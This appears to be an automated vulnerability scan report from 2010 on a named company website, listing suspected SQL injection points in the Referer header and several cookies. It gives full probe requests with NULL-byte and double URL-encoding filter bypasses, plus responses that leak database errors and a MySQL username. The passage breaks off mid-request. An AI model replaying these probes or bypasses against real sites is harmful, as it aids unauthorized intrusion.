The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%00' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:17:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:17:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:17:20 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:17:20 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:47:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:47:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:47:46 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:47:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24299
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/16-vki-studios-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:54:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:54:06 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:54:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23393
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <p>It seems like every year a new "Google killer" comes around, and each time they fail to even make a dent in the three (now two, sadly) search giants market control. This time it's the poorly named Blekko (bringing to mind either a character out of <a href="http://en.wikipedia.org/wiki ...[SNIP]...
Request 2
GET /resources/feeds/34-gaac-blogs/16-vki-studios-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141%2527%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:54:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/16-vki-studios-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:08:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/16-vki-studios-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:08:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:08:27 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:08:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:11:11 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141%2527%2527; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:11:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:11:23 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:11:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:13:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:13:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; 